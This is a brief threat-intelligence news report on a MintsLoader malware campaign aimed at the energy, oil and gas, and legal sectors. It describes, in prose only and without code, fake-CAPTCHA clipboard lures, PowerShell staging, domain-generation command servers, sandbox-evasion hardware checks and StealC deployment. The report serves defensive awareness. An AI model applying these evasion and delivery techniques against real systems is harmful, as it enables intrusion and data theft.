
Researchers at eSentire have recently identified a new wave of cyberattacks leveraging the MintsLoader malware dropper. This highly sophisticated campaign is targeting the energy, oil and gas, and legal sectors across the United States and Europe, highlighting the evolution of modern cyber threats.
MintsLoader is a PowerShell-based malware loader that spreads via malicious spam campaigns. When victims click on an embedded link, they unknowingly download an obfuscated JavaScript file, which in turn executes a PowerShell command to fetch and deploy MintsLoader. To evade detection, the malware is capable of self-uninstalling after execution.
A distinguishing feature of this campaign is its use of deceptive CAPTCHA challenges. Victims are tricked into copying and executing malicious PowerShell scripts that have been silently placed in their clipboard, following what appear to be on-screen instructions. These deceptive tactics, commonly referred to as ClickFix and KongTuke, have been increasingly exploited by cybercriminals.
Once executed, MintsLoader establishes communication with a command-and-control (C2) server, retrieving intermediate payloads. The malware employs domain generation algorithms (DGA), dynamically altering its C2 address daily to evade sandbox detection and forensic analysis.
The final stage of the attack involves deploying StealC, a powerful information-stealing malware that has been operating under the “Malware-as-a-Service” (MaaS) model since early 2023.
What sets MintsLoader apart is its unconventional runtime environment checks. The malware scrutinizes hardware specifications, including graphics controller type, CPU cache size, and total processor cores. If the system has only one core or less than 1111MB of memory, MintsLoader assumes it is running within a virtualized environment and immediately terminates execution.
This advanced evasion strategy significantly enhances MintsLoader’s resistance to analysis within sandbox environments and research systems, ensuring the continued success of the campaign. Additionally, threat actors rely on temporary hosting services to deliver the final payload, making it considerably more challenging to trace and disrupt the attack chain.
The convergence of social engineering tactics and advanced obfuscation techniques underscores the growing complexity of modern cyber threats. Security experts strongly advise organizations to remain vigilant and adopt multi-layered defense mechanisms to mitigate potential risks and enhance overall cybersecurity resilience.